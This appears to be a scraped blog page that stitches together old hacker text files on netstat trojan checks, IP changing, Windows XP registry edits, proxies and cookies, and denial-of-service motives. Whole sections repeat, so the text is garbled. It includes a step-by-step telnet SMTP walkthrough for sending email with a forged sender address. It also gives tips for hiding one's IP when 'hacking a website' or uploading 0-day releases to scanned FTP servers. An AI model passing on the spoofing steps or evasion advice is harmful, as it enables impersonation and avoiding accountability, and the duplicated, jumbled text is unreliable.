When you first turn on you computer (BEFORE DIALING INTO YOUR ISP),
open a MS-DOS Prompt window (start/programs MS-DOS Prompt).
Then type netstat -arn and press the Enter key.
Your screen should display the following (without the dotted lines
which I added for clarification).
-----------------------------------------------------------------------------
Active Routes:
Network Address = Netmask = Gateway Address = Interface = Metric
127.0.0.0 = 255.0.0.0 = 127.0.0.1 = 127.0.0.1 = 1
255.255.255.255 = 255.255.255.255 = 255.255.255.255 = 0.0.0.0 = 1
Route Table
Active Connections
Proto Local Address Foreign Address State
--------------------------------------------------------------------------------
If you see anything else, there might be a problem (more on that later).
Now dial into your ISP, once you are connected;
go back to the MS-DOS Prompt and run the same command as before
netstat -arn, this time it will look similar to the following (without
dotted lines).
-------------------------------------------------------------------------------------
Active Routes:
Network Address = Netmask = Gateway Address = Interface = Metric
0.0.0.0 = 0.0.0.0 = 216.1.104.70 = 216.1.104.70 = 1
127.0.0.0 = 255.0.0.0 = 127.0.0.1 = 127.0.0.1 = 1
216.1.104.0 = 255.255.255.0 = 216.1.104.70 = 216.1.104.70 = 1
216.1.104.70 = 255.255.255.255 = 127.0.0.1 = 127.0.0.1 = 1
216.1.104.255 = 255.255.255.255 = 216.1.104.70 = 216.1.104.70 = 1
224.0.0.0 = 224.0.0.0 = 216.1.104.70 = 216.1.104.70 = 1
255.255.255.255 = 255.255.255.255 = 216.1.104.70 = 216.1.104.70 = 1
Route Table
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:0 0.0.0.0:0 LISTENING
TCP 216.1.104.70:137 0.0.0.0:0 LISTENING
TCP 216.1.104.70:138 0.0.0.0:0 LISTENING
TCP 216.1.104.70:139 0.0.0.0:0 LISTENING
UDP 216.1.104.70:137 *:*
--------------------------------------------------------------------------------
What you are seeing in the first section (Active Routes) under the heading of
Network Address are some additional lines. The only ones that should be there
are ones belonging to your ISP (more on that later). In the second section
(Route Table) under Local Address you are seeing the IP address that your ISP
assigned you (in this example 216.1.104.70).
The numbers are divided into four dot notations, the first three should be
the same for both sets, while in this case the .70 is the unique number
assigned for THIS session. Next time you dial in that number will more than
likely be different.
To make sure that the first three notation are as they should be, we will run
one more command from the MS-DOS window.
From the MS-DOS Prompt type tracert /www.yourispwebsite.com or .net
or whatever it ends in. Following is an example of the output you should see.
---------------------------------------------------------------------------------------
Tracing route to /www.motion.net [207.239.117.112]over a maximum of 30 hops:
1 128 ms 2084 ms 102 ms chat-port.motion.net [216.1.104.4]
2 115 ms 188 ms 117 ms chat-core.motion.net [216.1.104.1]
3 108 ms 116 ms 119 ms www.motion.net [207.239.117.112]
Trace complete.
------------------------------------------------------------------------------------------
You will see that on lines with the 1 and 2 the first three notations of the
address match with what we saw above, which is a good thing. If it does not,
then some further investigation is needed.
If everything matches like above, you can almost breath easier. Another thing
which should you should check is programs launched during startup. To find
these, Click start/programs/startup, look at what shows up. You should be
able to recognize everything there, if not, once again more investigation is
needed.
-------------------------------------------------------------------------------------------
Now just because everything reported out like we expected (and demonstrated
above) we still are not out of the woods. How is this so, you ask? Do you use
Netmeeting? Do you get on IRC (Internet Relay Chat)? Or any other program
that makes use of the Internet. Have you every recieved an email with an
attachment that ended in .exe? The list goes on and on, basically anything
that you run could have become infected with a trojan. What this means, is
the program appears to do what you expect, but also does just a little more.
This little more could be blasting ebay.com or one of the other sites that
CNNlive was talking about.
What can you do? Well some anti-virus software will detect some trojans.
Another (tedious) thing is to start each of these "extra" Internet programs
one at a time and go through the last two steps above, looking at the routes
and connection the program uses. However, the tricky part will be figuring
out where to tracert to in order to find out if the addresses you see in
step 2 are "safe" or not. I should forewarn you, that running tracer after
tracert, after tracert might be considered "improper" by your ISP. The steps
outlined above may not work exactly as I have stated depending upon your ISP,
but with a true ISP it should work. Finally, this advise comes with NO
warranty and by following my "hints' you implicitly release me from ANY and
ALL liability which you may incur.
Other options
Display protocol statistics and current TCP/IP network connections.
Netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [intervals]
-a.. Display all connections and listening ports.
-e.. Display Ethernet statistics. This may be combined with the -s option.
-n.. Diplays address and port numbers in the numerical form.
-p proto..Shows connections for the protocol specified by proto; proto may be
TCP or UDP. If used with the -s option to display per-protocol statistics,
proto may be TCP, UDP, of IP.
-r.. Display the routing table.
-s.. Display per-protocol statistics. By default, statistics are shown for TCP
UDP and IP; the -p option may be used to specify a subset of the default
interval..Redisplay selected statistics, pausing intervals seconds between each
display. If omitted. netstat will print the current configuration information
once
Computer Learning Point
Saturday, December 20, 2014
Thursday, December 11, 2014
Change Your Ip In a Minute
![]() |
| ip address |
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back
Change default location for installing apps
As the size of hardrives increase, more people are using partitions to seperate and store groups of files.
XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.
Run the Registry Editor (regedit)and go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.
XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.
Run the Registry Editor (regedit)and go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.
Change text on XP start botton
Step 1 - XP Modify
Explorer.exe File
In order to make the
changes, the file explorer.exe located at C:\Windows needs to be edited. Since
explorer.exe is a binary file it requires a special editor. For purposes of
this article I have used Resource Hacker. Resource HackerTM is a freeware
utility to view, modify, rename, add, delete and extract resources in 32bit
Windows executables and resource files (*.res). It incorporates an internal
resource script compiler and decompiler and works on Microsoft Windows
95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.
get this from
h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip
The first step is to
make a backup copy of the file explorer.exe located at C:\Windows\explorer.
Place it in a folder somewhere on your hard drive where it will be safe. Start
Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.
The category we are
going to be using is "String Table". Expand it by clicking the plus
sign then navigate down to and expand string 37 followed by highlighting 1033.
If you are using the Classic Layout rather than the XP Layout, use number 38.
The right hand pane will display the stringtable. We’re going to modify item
578, currently showing the word “start” just as it displays on the current
Start button.
There is no magic
here. Just double click on the word “start” so that it’s highlighted, making
sure the quotation marks are not part of the highlight. They need to remain in
place, surrounding the new text that you’ll type. Go ahead and type your new
entry. In my case I used Click Me!
You’ll notice that
after the new text string has been entered the Compile Script button that was
grayed out is now active. I won’t get into what’s involved in compiling a
script, but suffice it to say it’s going to make this exercise worthwhile.
Click Compile Script and then save the altered file using the Save As command
on the File Menu. Do not use the Save command – Make sure to use the Save As
command and choose a name for the file. Save the newly named file to
C:\Windows.
Step 2 – Modify the
Registry [xp]
!!!make a backup of
your registry before making changes!!!
Now that the modified
explorer.exe has been created it’s necessary to modify the registry so the file
will be recognized when the user logs on to the system. If you don’t know how
to access the registry I’m not sure this article is for you, but just in case
it’s a temporary memory lapse, go to Start (soon to be something else) Run and
type regedit in the Open field. Navigate to:
HKEY_LOCAL_MACHINE\
SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
In the right pane,
double click the "Shell" entry to open the Edit String dialog box. In
Value data: line, enter the name that was used to save the modified
explorer.exe file. Click OK.
Close Registry Editor
and either log off the system and log back in, or reboot the entire system if
that’s your preference. If all went as planned you should see your new Start
button with the revised text.[/b]
Sunday, November 30, 2014
How to send ANONYMOUS emails to someone without a prong ?
Welcome to Hacker-devil's guide on how to send ANONYMOUS e-mails to someone without a prong.
I am Hacker-devil and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Anonymous e-mails without a program, it doesn't take
to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.
This way (to hackers) is old what as you are new by to this stuff, perhaps you may like to know how these anonymizes work, (home-made)
Well.....
Go to Start, then Run...
You have to Telnet (X server) on port 25
Well, (In this X server) you have to put the name of a server without the ( ) of course...
Put in iname.com in (X server) because it always work it is a server with many bugs in it.
(25) mail port.
So now we are like this.
telnet iname.com 25
and then you hit enter
Then When you have telnet open put the following like it is written
hello
and the machine will reply with smith.
Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all options available and in the emulation menu that's the following one you have to tick the second option.
Now you will see what you are writing.
then you put:
mail from:<whoeveryouwant@whetheveryouwant.whetever.whatever> and so on...
If you make an error start all over again
Example:
mail from:<askbill@microsoft.com.net>
You hit enter and then you put:
rcpt to:<lamer@lamer'sworld.com>
This one has to be an existence address as you are mailing anonymously to him.
Then you hit enter
And you type
Data
and hit enter once more
Then you write
Subject:wherever
And you hit enter
you write your mail
hit enter again (boring)
you put a simple:
.
Yes you don't see it its the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done
look:Try first do it with yourself I mean mail anonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!
Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....
Disc lamer:Hacker-devil is not responsible for whatever you do with this info. you can distribute this but you are totally forbidden to take out the "By Hacker-devil" line. You can't modify or customize this text and i am also not responsible if you send an e-mail to an important guy and insult him, and i rectally advise you that this is for educational porpoises only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you. If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com" insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.
By Hacker-devil
hackerdevil@iname.com
www.angelfire.com/ar/HDanzi/index.html
I am Hacker-devil and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Anonymous e-mails without a program, it doesn't take
to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.
This way (to hackers) is old what as you are new by to this stuff, perhaps you may like to know how these anonymizes work, (home-made)
Well.....
Go to Start, then Run...
You have to Telnet (X server) on port 25
Well, (In this X server) you have to put the name of a server without the ( ) of course...
Put in iname.com in (X server) because it always work it is a server with many bugs in it.
(25) mail port.
So now we are like this.
![]() |
| How to send ANONYMOUS emails to someone without a prong ? |
telnet iname.com 25
and then you hit enter
Then When you have telnet open put the following like it is written
hello
and the machine will reply with smith.
Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all options available and in the emulation menu that's the following one you have to tick the second option.
Now you will see what you are writing.
then you put:
mail from:<whoeveryouwant@whetheveryouwant.whetever.whatever> and so on...
If you make an error start all over again
Example:
mail from:<askbill@microsoft.com.net>
You hit enter and then you put:
rcpt to:<lamer@lamer'sworld.com>
This one has to be an existence address as you are mailing anonymously to him.
Then you hit enter
And you type
Data
and hit enter once more
Then you write
Subject:wherever
And you hit enter
you write your mail
hit enter again (boring)
you put a simple:
.
Yes you don't see it its the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done
look:Try first do it with yourself I mean mail anonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!
Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....
Disc lamer:Hacker-devil is not responsible for whatever you do with this info. you can distribute this but you are totally forbidden to take out the "By Hacker-devil" line. You can't modify or customize this text and i am also not responsible if you send an e-mail to an important guy and insult him, and i rectally advise you that this is for educational porpoises only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you. If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com" insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.
By Hacker-devil
hackerdevil@iname.com
www.angelfire.com/ar/HDanzi/index.html
Anonymity Proxy servers and Anonymity Cookies Cruncher
I can see you hiding in the shadows over there and so can the logs of all the web sites, FTP servers and other nooks and crannies you visit on the web. The sort of information gathered by these logs and which is available to the webmasters of the sites you visit include the address of the previous site you visited, your IP address, your computer's ID name, your physical location and the name of your ISP along with less personal details such as the operating system you're using and your screen resolution. If someone was snooping through your dustbin to gather information on consumer trends or tracking your every move to see where it is you go everyday you wouldn't be too chuffed would you. Well the web is no different, it's still an invasion of privacy and a threat to security and you don't have to put up with it.
Proxy servers:
Every time you visit a web site, detailed information about your system is automatically provided to the webmaster. This information can be used by hackers to exploit your computer or can be forwarded to the market research departments of consumer corporations who by tracking your activities on the internet are better equipped to direct more relevant spam at you. Your best defence against this is to use what is known as a proxy server, which will hide revealing information from the web sites you visit, allowing you to surf the web anonymously. These work by altering the way in which your browser retrieves web pages or connects to remote servers. With a proxy server set up, whenever you 'ask' IE or Netscape to look at a web page, the request is first sent through an external server which is completely independent of your ISP's servers. This third party server then does the requesting on your behalf so that it appears that the request came from them rather than you and your real IP address is never disclosed to the sites you visit. There is nothing to download and the whole process takes less than a minute.
There are two different ways to use proxy servers and both have their advantages and disadvantages. The first method is to use a web based service. What this involves is visiting the proxy's home page each time you want to browse a web site anonymously. The core component of such a system is the dialog box where you enter the address of the web site you want to visit. Each time you enter the URL of the site you want to browse via the proxy into this box, your personal information, IP address and so on is first encrypted before being sent to the site allowing you to maintain your anonymity. Two of the best examples of this type of web based proxy service are Code:
hxxp://www.rewebber.com/
and hxxp://www.anonymizer.com/.
Obviously one disadvantage of using a web based service like Re-Weber or Anonymize, however, is that you have to visit the proxies home page each time you want to surf anonymously. You could choose to select this page as your default home page, but it's still quite awkward if you're forever site hopping at the speed of light. The second main 'con' is that you often have to put up with extra adverts on the pages you visit. These are automatically inserted into the pages by the proxy - they have to pay for service somehow. More sophisticated and convenient solutions are also on offer yet they come with a price tag.
The second method you can use to protect your privacy via a proxy server involves adjusting the settings of your web browser so that you can surf anonymously without having to visit the home page of your proxy each time. To do this you will first need to know the name of your proxy server and the port number it uses. This information can be gleaned from either a public proxy server list or the FAQ referring to a private subscription based service. Once you have the name of the proxy server you wish to use, select 'Internet Options' from the 'Tools' menu of your browser. Now select 'Connections' followed by 'Settings' and tick the 'use a proxy server' check box. To finish the job all you have to do now is enter the name of the server in the 'address' box, the port which it uses in the 'port' box and go forth and surf anonymously.
Free, manual proxy servers as advertised on anonymity sites, if you can find one at all, are likely to be highly oversubscribed, and as a result the speed at which they retrieve web pages can deteriorate. In which case you can go in pursuit of a public proxy server list and select an alternative from it, which can then be set up manually. To locate such a list you can investigate sites such as Code:
hxxp://www.proxys4all.com/
however, this method isn't problem free either, so before you get too carried away and go jumping on the anonymity bandwagon there are a few things you should be aware of. It's very easy to use proxies to protect your privacy, but often the disadvantages of using them far out weigh the benefits. You see, the problem is that, like the proxy servers provided Re-Weber etc free public proxies are nearly all over subscribed and so they can slow down web browsing considerably. Digging out fast reliable proxy servers is an art form in itself and is a skill which takes considerable practice. You could find a list of public proxy servers and then experiment with each one until you find one that runs at a reasonable speed, but this can be very time consuming and frustrating. Instead, your search would be much more efficient if you got a dedicated program to carry out this task for you. There are literally dozens of proxy seeking programs around which can do just that, and many of them are available as freeware. What these do is scan the internet for public proxy servers. These servers are then tested for speed and anonymity (not all of them are truly anonymous, even if they claim to be!) and once you find one which suits your requirements you can select it as your default proxy with the click of a button.
One of the most significant advantages of using an automated tool to locate proxy servers is that you do not have to keep editing your proxy settings manually each time you wish to try out a new one. Instead, what you do is enter 'local-host' or '127.0.0.1' into the 'address' box and '8088' into the 'port' box of your browser's proxy settings menu and then forget about it. All future proxy switching is then orchestrated from within your proxy seeking software, which subsequently relays the information to your browser or whatever type of application you are attempting to make anonymous. For those of you who are curious 'local-host' and the IP address '127.0.0.1' are the names by which every computer on the internet refers to itself.
Here's a good selection of links, which should help you to get started - Code:
hxxp://www.a4proxy.com/ Anonymity 4 Proxy
hxxp://www.helgasoft.com/hiproxy/ Hi Proxy
hxxp://www.proxy-verifier.com/ Proxy Verifier
hxxp://www.photono-software.de/ Stealthier.
You may find that even when using these programs you have difficulty finding good proxy servers. It is for this reason that many people choose only to use proxy servers temporarily whilst doing something which may land them in trouble with their ISP, or in a worst case scenario with the law. The most obvious example of a situation in which you would want to cover your tracks is when scanning for public FTP servers and subsequently uploading to them. Most other net activities are unlikely to incur serious consequences so under these circumstances you can safely surf the web without a proxy. If you're really serious about protecting your privacy, however, your best bet is probably to invest in a dedicated, stable proxy such as the ones offered by Code:
hxxp://www.ultimate-anonymity.com/ Ultimate Anonymity
These aren't free, but may be worth the expense if you aren't keen on continuously switching proxy servers.
Before splashing out though it may be worth checking if your current ISP has a proxy server of its own which you can use. These aren't there to help you to commit cyber crimes and get away with it, they actually have a legitimate purpose as well - otherwise they wouldn't exist. You see, proxy servers were originally designed to help speed up web page loading times. Proxy servers contain a cache of all the web pages which have been requested via the browsers of the people using the proxy. When someone surfs the web using a proxy, the proxy first checks to see if it already has a copy of the web page stored in its cache. If this version of the page is bang up to date, it is sent to your computer and appears in your browser. If the page found in the cache of the proxy server is older than the one stored on the server hosting the page, a new request to the web server is made and the page is updated in the cache of the proxy before being sent to you. Because these servers use very fast internet connections they can retrieve web pages at much greater speeds than you can via your modest home setup. If these servers are located physically nearer to your home than the web host servers you wish to retrieve web pages from, the speed at which you browse the web will be accelerated.
Anonymity - Cookies
One last important point you need to be aware of before jumping in with both feet is that different programs have to be setup in different ways before being able to make external connections via a proxy server. For example, you can surf the web anonymously by modifying the settings in Internet Explorer or Netscape Navigator as explained earlier in this tutorial, but this will only affect your browser. If you then used Flash XP to copy a batch of 0-day releases from one FTP server to another, this isn't going to protect you in the slightest. What you have to do is enter the name of the proxy server into each application you wish to make anonymous before making any external connections. This can usually be done by browsing through the preferences of your program to see if there is a 'use proxy server' option available. If there is, make sure you use it!
Cookies:
You have little to fear from the edible variety, but the digital ones can be a major threat to your security and privacy. A cookie is a tiny text file (usually less than 1kb in size), which is created and stored on your hard drive whenever you visit a dynamic (or an interactive if you like) web site. These are used to log your personal details so that you can access members only areas of web sites without having to type in a password every time, or to retain your customized settings so that they are available the next time you visit. If you're using a shared computer, anyone who visits the same site that you have previously logged in to can access your accounts. This is particularly worrying if you have entered your credit card details into a form on an e-commerce site. If your browser is set to automatically fill in these details whenever you
return to a previously visited site, this information could be clearly visible - you don't need me to explain the problems this could entail.
The solution to this problem is to delete any cookies which contain sensitive data once you have completed your transactions. Your cookies will be stored in a different place depending on which operating system you are using so you will have to use your detective skills to find them. As an example, in Windows XP they are located in your 'c:\Documents and Settings\Kylie Minogue\Cookies' directory (that is if your name is Kylie minogue. Mine isn't in case you're wondering!). If you look in this directory, in some cases it is easy to identify which cookie is associated with which web site, but in other cases it's not so obvious. The cookie which was created when you visited Yahoo.com to check your email may be called Kylie minogue@yahoo.txt for example. Unfortunately some cookies refer to the IP address of the site you visited and so look more like Kylie minogue@145.147.25.21. These cookies can be selectively deleted one at a time if it's obvious which ones are causing a threat to your security, or you can just wipe out the whole lot in one fell swoop and have them recreated as and when they are required. However, if
you're really struggling to find your cookie jar, you could delete your cookies via your browser's tool bar instead. In Internet Explorer this can be done through the 'Tools' > 'Internet Options' menu items.
If all this sounds like too much hassle, you can always find a lab our saving program which will be happy to take the job off your hands. These 'cookie crunching' programs allow you to be more selective when editing, viewing and deleting cookies from your system, and some of them will even prevent cookies from being created in the first place. Yes, I know you're hungry for links so I won't deprive you. Have a look here - Code:
hxxp://www.rbaworld.com/Programs/CookieCruncher/ Cookie
Cruncher
hxxp://www.thelimitsoft.com/ Cookie Crusher
hxxp://www.angove.com/ Cookie Killer
hxxp://www.kburra.com/ Cookie Pal
and
hxxp://www.cookiecentral.com/ Cookie Web Kit.
![]() |
| Anonymity Proxy servers and Anonymity Cookies Cruncher |
Proxy servers:
Every time you visit a web site, detailed information about your system is automatically provided to the webmaster. This information can be used by hackers to exploit your computer or can be forwarded to the market research departments of consumer corporations who by tracking your activities on the internet are better equipped to direct more relevant spam at you. Your best defence against this is to use what is known as a proxy server, which will hide revealing information from the web sites you visit, allowing you to surf the web anonymously. These work by altering the way in which your browser retrieves web pages or connects to remote servers. With a proxy server set up, whenever you 'ask' IE or Netscape to look at a web page, the request is first sent through an external server which is completely independent of your ISP's servers. This third party server then does the requesting on your behalf so that it appears that the request came from them rather than you and your real IP address is never disclosed to the sites you visit. There is nothing to download and the whole process takes less than a minute.
There are two different ways to use proxy servers and both have their advantages and disadvantages. The first method is to use a web based service. What this involves is visiting the proxy's home page each time you want to browse a web site anonymously. The core component of such a system is the dialog box where you enter the address of the web site you want to visit. Each time you enter the URL of the site you want to browse via the proxy into this box, your personal information, IP address and so on is first encrypted before being sent to the site allowing you to maintain your anonymity. Two of the best examples of this type of web based proxy service are Code:
hxxp://www.rewebber.com/
and hxxp://www.anonymizer.com/.
Obviously one disadvantage of using a web based service like Re-Weber or Anonymize, however, is that you have to visit the proxies home page each time you want to surf anonymously. You could choose to select this page as your default home page, but it's still quite awkward if you're forever site hopping at the speed of light. The second main 'con' is that you often have to put up with extra adverts on the pages you visit. These are automatically inserted into the pages by the proxy - they have to pay for service somehow. More sophisticated and convenient solutions are also on offer yet they come with a price tag.
The second method you can use to protect your privacy via a proxy server involves adjusting the settings of your web browser so that you can surf anonymously without having to visit the home page of your proxy each time. To do this you will first need to know the name of your proxy server and the port number it uses. This information can be gleaned from either a public proxy server list or the FAQ referring to a private subscription based service. Once you have the name of the proxy server you wish to use, select 'Internet Options' from the 'Tools' menu of your browser. Now select 'Connections' followed by 'Settings' and tick the 'use a proxy server' check box. To finish the job all you have to do now is enter the name of the server in the 'address' box, the port which it uses in the 'port' box and go forth and surf anonymously.
Free, manual proxy servers as advertised on anonymity sites, if you can find one at all, are likely to be highly oversubscribed, and as a result the speed at which they retrieve web pages can deteriorate. In which case you can go in pursuit of a public proxy server list and select an alternative from it, which can then be set up manually. To locate such a list you can investigate sites such as Code:
hxxp://www.proxys4all.com/
however, this method isn't problem free either, so before you get too carried away and go jumping on the anonymity bandwagon there are a few things you should be aware of. It's very easy to use proxies to protect your privacy, but often the disadvantages of using them far out weigh the benefits. You see, the problem is that, like the proxy servers provided Re-Weber etc free public proxies are nearly all over subscribed and so they can slow down web browsing considerably. Digging out fast reliable proxy servers is an art form in itself and is a skill which takes considerable practice. You could find a list of public proxy servers and then experiment with each one until you find one that runs at a reasonable speed, but this can be very time consuming and frustrating. Instead, your search would be much more efficient if you got a dedicated program to carry out this task for you. There are literally dozens of proxy seeking programs around which can do just that, and many of them are available as freeware. What these do is scan the internet for public proxy servers. These servers are then tested for speed and anonymity (not all of them are truly anonymous, even if they claim to be!) and once you find one which suits your requirements you can select it as your default proxy with the click of a button.
One of the most significant advantages of using an automated tool to locate proxy servers is that you do not have to keep editing your proxy settings manually each time you wish to try out a new one. Instead, what you do is enter 'local-host' or '127.0.0.1' into the 'address' box and '8088' into the 'port' box of your browser's proxy settings menu and then forget about it. All future proxy switching is then orchestrated from within your proxy seeking software, which subsequently relays the information to your browser or whatever type of application you are attempting to make anonymous. For those of you who are curious 'local-host' and the IP address '127.0.0.1' are the names by which every computer on the internet refers to itself.
Here's a good selection of links, which should help you to get started - Code:
hxxp://www.a4proxy.com/ Anonymity 4 Proxy
hxxp://www.helgasoft.com/hiproxy/ Hi Proxy
hxxp://www.proxy-verifier.com/ Proxy Verifier
hxxp://www.photono-software.de/ Stealthier.
You may find that even when using these programs you have difficulty finding good proxy servers. It is for this reason that many people choose only to use proxy servers temporarily whilst doing something which may land them in trouble with their ISP, or in a worst case scenario with the law. The most obvious example of a situation in which you would want to cover your tracks is when scanning for public FTP servers and subsequently uploading to them. Most other net activities are unlikely to incur serious consequences so under these circumstances you can safely surf the web without a proxy. If you're really serious about protecting your privacy, however, your best bet is probably to invest in a dedicated, stable proxy such as the ones offered by Code:
hxxp://www.ultimate-anonymity.com/ Ultimate Anonymity
These aren't free, but may be worth the expense if you aren't keen on continuously switching proxy servers.
Before splashing out though it may be worth checking if your current ISP has a proxy server of its own which you can use. These aren't there to help you to commit cyber crimes and get away with it, they actually have a legitimate purpose as well - otherwise they wouldn't exist. You see, proxy servers were originally designed to help speed up web page loading times. Proxy servers contain a cache of all the web pages which have been requested via the browsers of the people using the proxy. When someone surfs the web using a proxy, the proxy first checks to see if it already has a copy of the web page stored in its cache. If this version of the page is bang up to date, it is sent to your computer and appears in your browser. If the page found in the cache of the proxy server is older than the one stored on the server hosting the page, a new request to the web server is made and the page is updated in the cache of the proxy before being sent to you. Because these servers use very fast internet connections they can retrieve web pages at much greater speeds than you can via your modest home setup. If these servers are located physically nearer to your home than the web host servers you wish to retrieve web pages from, the speed at which you browse the web will be accelerated.
Anonymity - Cookies
One last important point you need to be aware of before jumping in with both feet is that different programs have to be setup in different ways before being able to make external connections via a proxy server. For example, you can surf the web anonymously by modifying the settings in Internet Explorer or Netscape Navigator as explained earlier in this tutorial, but this will only affect your browser. If you then used Flash XP to copy a batch of 0-day releases from one FTP server to another, this isn't going to protect you in the slightest. What you have to do is enter the name of the proxy server into each application you wish to make anonymous before making any external connections. This can usually be done by browsing through the preferences of your program to see if there is a 'use proxy server' option available. If there is, make sure you use it!
Cookies:
You have little to fear from the edible variety, but the digital ones can be a major threat to your security and privacy. A cookie is a tiny text file (usually less than 1kb in size), which is created and stored on your hard drive whenever you visit a dynamic (or an interactive if you like) web site. These are used to log your personal details so that you can access members only areas of web sites without having to type in a password every time, or to retain your customized settings so that they are available the next time you visit. If you're using a shared computer, anyone who visits the same site that you have previously logged in to can access your accounts. This is particularly worrying if you have entered your credit card details into a form on an e-commerce site. If your browser is set to automatically fill in these details whenever you
return to a previously visited site, this information could be clearly visible - you don't need me to explain the problems this could entail.
The solution to this problem is to delete any cookies which contain sensitive data once you have completed your transactions. Your cookies will be stored in a different place depending on which operating system you are using so you will have to use your detective skills to find them. As an example, in Windows XP they are located in your 'c:\Documents and Settings\Kylie Minogue\Cookies' directory (that is if your name is Kylie minogue. Mine isn't in case you're wondering!). If you look in this directory, in some cases it is easy to identify which cookie is associated with which web site, but in other cases it's not so obvious. The cookie which was created when you visited Yahoo.com to check your email may be called Kylie minogue@yahoo.txt for example. Unfortunately some cookies refer to the IP address of the site you visited and so look more like Kylie minogue@145.147.25.21. These cookies can be selectively deleted one at a time if it's obvious which ones are causing a threat to your security, or you can just wipe out the whole lot in one fell swoop and have them recreated as and when they are required. However, if
you're really struggling to find your cookie jar, you could delete your cookies via your browser's tool bar instead. In Internet Explorer this can be done through the 'Tools' > 'Internet Options' menu items.
If all this sounds like too much hassle, you can always find a lab our saving program which will be happy to take the job off your hands. These 'cookie crunching' programs allow you to be more selective when editing, viewing and deleting cookies from your system, and some of them will even prevent cookies from being created in the first place. Yes, I know you're hungry for links so I won't deprive you. Have a look here - Code:
hxxp://www.rbaworld.com/Programs/CookieCruncher/ Cookie
Cruncher
hxxp://www.thelimitsoft.com/ Cookie Crusher
hxxp://www.angove.com/ Cookie Killer
hxxp://www.kburra.com/ Cookie Pal
and
hxxp://www.cookiecentral.com/ Cookie Web Kit.
INTRODUCTION TO DENIAL OF SERVICE
A. INTRODUCTION~~~~~~~~~~~~~~~~
A.1. WHAT IS A DENIAL OF SERVICE ATTACK ?
Denial of service is about without permission knocking off
services, for example through crashing the whole system. This
kind of attacks are easy to launch and it is hard to protect
a system against them. The basic problem is that Unix
assumes that users on the system or on other systems will be
well behaved.
A.2. WHY WOULD SOMEONE CRASH A SYSTEM ?
A.2.1. INTRODUCTION
Why would someone crash a system? I can think of several reasons
that I have presentated more precisely in a section for each reason,
but for short:
.1. Sub-cultural status.
.2. To gain access.
.3. Revenge.
.4. Political reasons.
.5. Economical reasons.
.6. Nastiness.
I think that number one and six are the more common today, but that
number four and five will be the more common ones in the future.
A.2.2. SUB-CULTURAL STATUS
After all information about syn flooding a bunch of such attacks
were launched around Sweden. The very most of these attacks were
not a part of a IP spoof attack, it was "only" a denial of service
attack. Why?
I think that hackers attack systems as a sub-cultural pseudo career
and I think that many denial of service attacks, and here in the
example syn flooding, were performed for these reasons. I also think
that many hackers begin their career with denial of service attacks.
.A.2.3. TO GAIN ACCESS
Sometimes could a denial of service attack be a part of an attack to
gain access at a system. At the moment I can think of these reasons
and specific holes:
.1. Some older X-lock versions could be crashed with a
method from the denial of service family leaving the system
open. Physical access was needed to use the work space after.
.2. Syn flooding could be a part of a IP-spoof attack method.
.3. Some program systems could have holes under the start up,
that could be used to gain root, for example SSH (secure shell).
.4. Under an attack it could be usable to crash other machines
in the network or to deny certain persons the ability to access
the system.
